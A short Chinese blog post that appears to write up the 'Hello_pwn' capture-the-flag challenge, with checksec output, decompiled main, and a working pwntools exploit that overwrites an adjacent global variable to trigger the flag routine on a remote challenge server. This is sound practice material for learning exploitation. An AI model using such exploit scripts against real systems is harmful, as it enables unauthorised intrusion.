攻防世界 Hello_pwn PWN

先查壳,只开了 NX

[*] '\hellopwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

 放进 IDA 反编译。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686();
  return 0LL;
}

大概是读进 601068 ,然后对 60106C 作比较

利用 read 的溢出。

from pwn import *

p = remote("61.147.171.105", 64116)
payload = b'O'*4 + p64(1853186401)
p.sendlineafter('lets get helloworld for bof', payload)
p.interactive()
posted @ 2024-04-11 12:55  monyhzc  阅读(33)  评论(0编辑  收藏  举报